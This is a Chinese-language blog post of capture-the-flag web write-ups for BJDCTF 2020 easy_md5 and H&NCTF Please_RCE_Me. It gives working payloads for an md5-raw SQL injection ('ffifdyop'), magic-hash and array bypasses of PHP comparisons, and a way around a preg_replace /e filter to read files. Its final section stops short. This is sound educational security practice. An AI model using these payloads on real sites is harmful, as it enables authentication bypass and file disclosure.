1
2
3
4
5
6
7
8
9
title: 做题记录
categories:
- web
-
abbrlink: 2701
date: YYYY-MM-DD HH:mm:ss
tags:
- web
-

[BJDCTF 2020]easy_md5

image-20240429210559144

使用bp抓包发包可以得到hint

image-20240429212654423

1
hint:select * from 'admin' where password=md5($pass,true)

突破点在md5的用法

image-20240429212844829

可以看到,如果raw这里是true,那么返回是是字符串的二进制格式

如果让md5值经过hex转换为字符串后为’or’+balabala,那么拼接后构成的SQL语句为

1
select * from 'admin' where password=''or'balabala'

当or后面的值为true时,就可构成万能密码,从而实现SQL注入

在这里,我们需要知道MySQL的一个特性

在mysql里面,在用作布尔型判断时,or后面的字符型语句如果是以数字开头的,返回值就是true,即

1
2
3
4
5
6
7
or'数字+任意字符'
例如
select * from `admin` where password=''or'1abcdefg' ---> True
select * from `admin` where password=''or'0abcdefg' ---> False
select * from `admin` where password=''or'1' ---> True
select * from `admin` where password=''or'2' ---> True
select * from `admin` where password=''or'0' ---> False

只要or后面的字符串的首字母为数字都会返回true,这是我们的突破点

这里提供一个最常用的:ffifdyop,该字符串md5加密后若raw参数为true会返回’or’

ffifdyop的原理:https://www.cnblogs.com/redfish404/articles/17878453.html

所以直接输入ffifdyop

image-20240429215117168

查看源代码,得到

1
2
3
4
5
6
7
<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
header('Location: levell14.php');
-->

这里是md5的弱类型比较,

当两个字符串经过MD5后转换为以0e开头的字符串进行比较时,返回true

有以下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

paylod:

?a=s878926199a&b=s1665632922a

返回:

1
2
3
4
5
6
7
8
9
<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}

这里利用了md5的强比较漏洞

由于MD5是无法识别数组的,所以当MD5的数组返回为null,

所以payload:

1
param1[]=1&param2[]=2

参考:md5,sha1比较漏洞

2024H&NCTF(Please_RCE_Me)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
if($_GET['moran'] === 'flag'){
highlight_file(__FILE__);
if(isset($_POST['task'])&&isset($_POST['flag'])){
$str1 = $_POST['task'];
$str2 = $_POST['flag'];
if(preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i',$str1) || strlen($str2) != 19 || preg_match('/please_give_me_flag/',$str2)){
die('hacker!');
}else{
preg_replace("/please_give_me_flag/ei",$_POST['task'],$_POST['flag']);
}
}
}else{
echo "moran want a flag.</br>(?moran=flag)";
}

因为flag的值必须为19而且能与please_give_me_flag匹配,所以可以利用大小写绕过,flag=please_give_me_flaG

对于task,明显过滤了很多常见的命令执行函数

这里有四个函数,可以参考参考

1.readfile

image-20240514193532783

2.show_source(显示当前文件的源代码或者文本内容)

image-20240514193742880

3.highlight_file

image-20240514193934388

4.file_get_contents

image-20240514194136648

5.编码